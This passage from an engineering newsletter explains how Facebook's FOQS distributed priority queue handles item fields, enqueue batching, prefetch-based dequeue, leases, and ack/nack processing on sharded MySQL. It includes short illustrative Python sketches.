  • Payload contains the actual work data. This is an immutable binary blob, up to around 10 KB in size. For example, it could include information about which video to encode or which translation task to perform.

  • Metadata is a mutable field containing a few hundred bytes. This is often used to store intermediate results, retry counts, or backoff information during the item’s lifecycle.

  • Deliver_after is a timestamp that specifies when the item becomes eligible for dequeue. This enables delayed delivery, which is useful for scheduling tasks in the future or applying backoff policies.

  • Lease_duration defines how long a consumer has to acknowledge or reject (ack/nack) the item after dequeuing it. If this time expires without a response, FOQS applies the namespace’s redelivery policy.

  • TTL (time-to-live) specifies when the item should expire and be removed automatically, even if it has not been processed.

  • FOQS ID is a globally unique identifier that encodes the shard ID and a 64-bit primary key. This ID allows FOQS to quickly locate the item’s shard and ensure correct routing for acknowledgments and retries.

Together, these fields give FOQS the ability to control when items become available, how they are prioritized, how long they live, and how they are tracked reliably in a distributed system. By storing each item as a single MySQL row, FOQS benefits from strong consistency, efficient indexing, and mature operational tools, which are crucial at Facebook’s scale.
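
Putting those fields together, an item can be pictured roughly like this. This is a sketch for intuition only, not Facebook's actual schema:

```python
import time
from dataclasses import dataclass, field

@dataclass
class Item:
    namespace: str                  # tenant and capacity unit
    topic: str                      # logical priority queue within the namespace
    priority: int                   # lower value = delivered earlier
    payload: bytes                  # immutable work description, up to ~10 KB
    metadata: dict = field(default_factory=dict)              # mutable: retries, backoff, progress
    deliver_after: float = field(default_factory=time.time)   # earliest time it may be dequeued
    lease_duration_s: int = 300     # time the consumer has to ack/nack after dequeue
    ttl_s: int = 86_400             # expire the item after this long, even if unprocessed
    foqs_id: str = ""               # encodes shard id + 64-bit primary key
```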

Enqueue Path

The enqueue path in FOQS is responsible for adding new items into the queue reliably and efficiently.

Since FOQS processes trillions of enqueue operations per day, this part of the system must be extremely well optimized for write throughput while also being careful not to overload the underlying MySQL shards. Facebook designed the enqueue pipeline to use buffering, batching, and protective mechanisms to maintain stability under heavy load.

When a client wants to add a new task, it sends an Enqueue request to the appropriate FOQS host. Instead of immediately writing this item to the database, the host first places the request into an in-memory buffer. This approach allows FOQS to batch multiple enqueues together for each shard, which is much more efficient than inserting them one by one. As soon as the request is accepted into the buffer, the client receives a promise that the enqueue operation will be processed shortly.

See the diagram below:

In the background, per-shard worker threads continuously drain these buffers. Each shard of the MySQL database has its own set of workers that take the enqueued items from memory and perform insert operations into the shard’s MySQL table. This batching significantly reduces the overhead on MySQL and enables FOQS to sustain massive write rates across many shards simultaneously.

Once the database operation is completed, FOQS fulfills the original promise and sends the result back to the client. If the insert was successful, the client receives the FOQS ID of the newly enqueued item, which uniquely identifies its location. If there was an error, the client is informed accordingly.

An important part of this pipeline is FOQS’s circuit breaker logic, which helps protect both the service and the database from cascading failures. The circuit breaker continuously monitors the health of each MySQL shard. If it detects sustained slow queries or a spike in error rates, it temporarily marks that shard as unhealthy. When a shard is marked unhealthy, FOQS stops sending new enqueue requests to it until it recovers. This prevents a situation where a struggling shard receives more and more traffic, making its performance even worse. By backing off from unhealthy shards, FOQS avoids the classic “thundering herd” problem where too many clients keep retrying against a slow or failing component, causing further instability.

This careful combination of buffering, batching, and protective measures allows FOQS to handle extremely high write volumes without overwhelming its storage backend. It ensures that enqueues remain fast and reliable, even during periods of peak activity or partial database failures.
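
A stripped-down sketch of the idea: enqueue requests land in a per-shard in-memory buffer, and a background worker flushes each buffer to storage in batches, skipping shards the circuit breaker currently marks unhealthy. Every name here is illustrative; the real system writes to MySQL and returns promises to callers.

```python
import collections
import threading
import time

buffers = collections.defaultdict(list)   # shard_id -> pending enqueue requests
unhealthy_shards = set()                   # shards the circuit breaker has tripped
lock = threading.Lock()

def enqueue(shard_id: int, item: dict) -> None:
    """Accept the request into memory immediately; the insert happens asynchronously."""
    with lock:
        buffers[shard_id].append(item)

def insert_batch(shard_id: int, batch: list) -> None:
    """Stand-in for one batched INSERT into the shard's MySQL table."""
    print(f"shard {shard_id}: inserted {len(batch)} items")

def shard_worker(shard_id: int) -> None:
    """Per-shard drainer: batch up buffered items and write them out."""
    while True:
        time.sleep(0.05)                   # drain interval
        if shard_id in unhealthy_shards:
            continue                       # back off instead of piling onto a sick shard
        with lock:
            batch, buffers[shard_id] = buffers[shard_id], []
        if batch:
            insert_batch(shard_id, batch)
```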

Dequeue Path

Once tasks have been enqueued, FOQS must deliver them to consumers efficiently and in the correct order.

At Facebook’s scale, the dequeue path needs to support extremely high read throughput while respecting task priorities and scheduled delivery times. To achieve this, FOQS uses a clever combination of in-memory indexes, prefetching, and demand-aware buffering. This design allows the system to serve dequeue requests quickly without hitting the MySQL databases for every single read.

Each MySQL shard maintains an in-memory index of items that are ready to be delivered. This index contains the primary keys of items that can be dequeued immediately, sorted first by priority (with lower numbers meaning higher priority) and then by their deliver_after timestamps. By keeping this index in memory, FOQS avoids repeatedly scanning large database tables just to find the next item to deliver. This is critical for maintaining low latency and high throughput when millions of dequeue operations happen every second.

On top of these per-shard indexes, each FOQS host runs a component called the Prefetch Buffer. This buffer continuously performs a k-way merge across the indexes of all shards that the host is responsible for.

For reference, a k-way merge is a standard algorithmic technique used to combine multiple sorted lists into one sorted list efficiently. In this case, it helps FOQS select the overall best items to deliver next, based on their priority and deliver_after time, from many shards at once. As the prefetcher pulls items from the shards, it marks those items as “delivered” in MySQL. This step prevents the same item from being handed out to multiple consumers simultaneously, ensuring correct delivery semantics. The selected items are then stored in the Prefetch Buffer in memory.
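
The merge itself is easy to picture with Python's standard library. Each list below stands in for one shard's in-memory index, already sorted by (priority, deliver_after); the merged stream is what fills the Prefetch Buffer.

```python
import heapq

# Per-shard ready items as (priority, deliver_after, item_id) tuples, already sorted.
shard_a = [(1, 100, "a1"), (3, 105, "a2"), (7, 110, "a3")]
shard_b = [(2, 101, "b1"), (2, 108, "b2")]
shard_c = [(1, 103, "c1"), (9, 120, "c2")]

# k-way merge: one globally ordered stream across all shards on this host.
prefetch_buffer = list(heapq.merge(shard_a, shard_b, shard_c))
print([item_id for _, _, item_id in prefetch_buffer[:4]])
# ['a1', 'c1', 'b1', 'b2'] -- best priority first, ties broken by deliver_after
```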

When a client issues a Dequeue request, FOQS simply drains items from the Prefetch Buffer instead of going to the database. This makes dequeue operations very fast, since they are served entirely from memory and benefit from the pre-sorted order of the buffer. The Prefetch Buffer is constantly replenished in the background, so there is usually a pool of ready-to-deliver items available at any moment.

The prefetcher is also demand-aware, meaning it adapts its behavior based on actual consumption patterns. FOQS tracks dequeue rates for each topic and uses this information to refill the Prefetch Buffer proportionally to the demand. Topics that are being consumed heavily receive more aggressive prefetching, which keeps them “warm” in memory and ensures that high-traffic topics can sustain their dequeue rates without delay. This adaptive strategy allows FOQS to balance efficiency across a large number of topics with very different workloads.

Once an item is dequeued, its lease period begins. A lease defines how long the consumer has to either acknowledge (ack) or reject (nack) the item. If the lease expires without receiving either response, FOQS applies the namespace’s delivery policy.

There are two possible behaviors:

  • At-least-once delivery: The item is returned to the queue and redelivered later. This ensures no tasks are lost, but consumers must handle potential duplicates.

  • At-most-once delivery: The item is deleted after the lease expires. This avoids duplicates but risks losing tasks if the consumer crashes before processing.

This lease and retry mechanism allows FOQS to handle consumer failures gracefully. If a consumer crashes or becomes unresponsive, FOQS can safely redeliver the work to another consumer (or discard it if at-most-once is chosen).

Ack/Nack Path

Once a consumer finishes processing an item, it must inform FOQS about the result. This is done through acknowledgment (ack) or negative acknowledgment (nack) operations.

Every item in FOQS has a FOQS ID that encodes the shard ID and a unique primary key. When a client wants to acknowledge or reject an item, it uses this shard ID to route the request to the correct FOQS host. This step is crucial because only the host that currently owns the shard can modify the corresponding MySQL rows safely. By routing directly to the right place, FOQS avoids unnecessary network hops and ensures that updates are applied quickly and consistently.

When the FOQS host receives an ack or nack request, it does not immediately write to the database. Instead, it appends the request to an in-memory buffer that is maintained per shard. This buffering is similar to what happens during the enqueue path. By batching multiple ack and nack operations together, FOQS can apply them to the database more efficiently, reducing write overhead and improving overall throughput. See the diagram below:

Worker threads on each shard continuously drain these buffers and apply the necessary changes to the MySQL database:

  • For ack operations, the worker simply deletes the row associated with the item from the shard’s MySQL table. This signals that the task has been successfully completed and permanently removes it from the queue.

  • For nack operations, the worker updates the item’s deliver_after timestamp and metadata fields. This allows the item to be redelivered later after the specified delay. Updating metadata is useful for tracking retry counts, recording partial progress, or implementing backoff strategies before the next attempt.

The ack and nack operations are idempotent, which means they can be retried safely without causing inconsistent states.

For example, if an ack request is sent twice by mistake or due to a network retry, deleting the same row again has no harmful effect. Similarly, applying the same nack update multiple times leads to the same final state. Idempotency is essential in distributed systems, where messages may be delayed, duplicated, or retried because of transient failures.
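
A toy model of why such retries are safe, with a dict standing in for the shard's MySQL table:

```python
shard_table = {"item_1": {"deliver_after": 0.0, "metadata": {}}}

def ack(item_id: str) -> None:
    """Delete the row; deleting an already-deleted row changes nothing."""
    shard_table.pop(item_id, None)

def nack(item_id: str, redeliver_at: float) -> None:
    """Set the new delivery time; applying the same update twice leaves the same state."""
    row = shard_table.get(item_id)
    if row:
        row["deliver_after"] = redeliver_at

nack("item_1", redeliver_at=1_700_000_300.0)
nack("item_1", redeliver_at=1_700_000_300.0)   # duplicate nack: same final state
ack("item_1")
ack("item_1")                                  # duplicate ack: row is simply gone
```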

If an ack or nack operation fails due to a network issue or a host crash, FOQS does not lose track of the item. When the item’s lease expires, FOQS automatically applies the namespace’s redelivery policy. This ensures that unacknowledged work is either retried (for at-least-once delivery) or cleaned up (for at-most-once delivery), maintaining forward progress without requiring manual intervention.

Push vs Pull

One of the key design decisions in FOQS is its use of a pull-based model for delivering work to consumers.

In a pull model, consumers actively request new items when they are ready to process them, rather than the system pushing items to consumers automatically. Facebook chose this approach because it provides better control, flexibility, and scalability across many different types of workloads.

Workloads inside Facebook vary widely. Some require low latency and high throughput, while others involve slower, scheduled processing. A push model would require FOQS to track each consumer’s capacity and flow control in real time to avoid overwhelming slower workers. This becomes complicated and error-prone at Facebook’s scale, where consumers can number in the thousands and have very different performance characteristics.

The pull model simplifies this problem. Each consumer can control its own processing rate by deciding when and how much to dequeue. This prevents bottlenecks caused by overloaded consumers and makes the system more resilient to sudden slowdowns. It also allows consumers to handle regional affinity and load balancing intelligently, since they can choose where to pull work from based on their location and capacity.

However, the main drawback of pull systems is that consumers need a way to discover available work efficiently. FOQS addresses this with its routing layer and topic discovery API, which help consumers find active topics and shards without scanning the entire system.

Operating at Facebook Scale

FOQS is designed to handle massive workloads that would overwhelm traditional queueing systems.

See the diagram below that shows the distributed architecture for FOQS:

At Facebook, the service processes roughly one trillion items every day. This scale includes not only enqueuing and dequeuing tasks but also managing retries, delays, expirations, and acknowledgments across many regions.

Large distributed systems frequently experience temporary slowdowns or downstream outages. During these events, FOQS may accumulate backlogs of hundreds of billions of items. Instead of treating this as an exception, the system is built to function normally under backlog conditions. Its sharded MySQL storage, prefetching strategy, and routing logic ensure that tasks continue to flow without collapsing under the load.

A key aspect of this scalability is FOQS’s MySQL-centric design. Rather than relying on specialized storage systems, the Facebook engineering team optimized MySQL with careful indexing, in-memory ready queues, and checkpointed scans.

By combining sharding, batching, and resilient queue management, FOQS sustains enormous traffic volumes while maintaining reliability and predictable performance.

Conclusion

Facebook Ordered Queueing Service (FOQS) shows how a priority queue can support diverse workloads at a massive scale.

By building on sharded MySQL and combining techniques like buffering, prefetching, adaptive routing, and leases, FOQS achieves both high performance and operational resilience. Its pull-based model gives consumers control over their processing rates, while its abstractions of namespaces, topics, and items make it flexible enough to support many teams and use cases across the company.

A crucial part of FOQS’s reliability is its disaster readiness strategy. Each shard is replicated across multiple regions, and binlogs are stored both locally and asynchronously across regions. During maintenance or regional failures, Facebook can promote replicas and shift traffic to healthy regions with minimal disruption. This ensures the queue remains functional even when large parts of the infrastructure are affected.

Looking ahead, the Facebook engineering team continues to evolve FOQS to handle more complex failure modes and scaling challenges. Areas of active work include improving multi-region load balancing, refining discoverability as data spreads, and expanding workflow features such as timers and stricter ordering guarantees. These improvements aim to keep FOQS reliable as Facebook’s workloads continue to grow and diversify.

References:


SPONSOR US

Get your product in front of more than 1,000,000 tech professionals.

Our newsletter puts your products and services directly in front of an audience that matters - hundreds of thousands of engineering leaders and senior engineers - who have influence over significant tech decisions and big purchases.

Space Fills Up Fast - Reserve Today

Ad spots typically sell out about 4 weeks in advance. To ensure your ad reaches this influential audience, reserve your space now by emailing [email protected].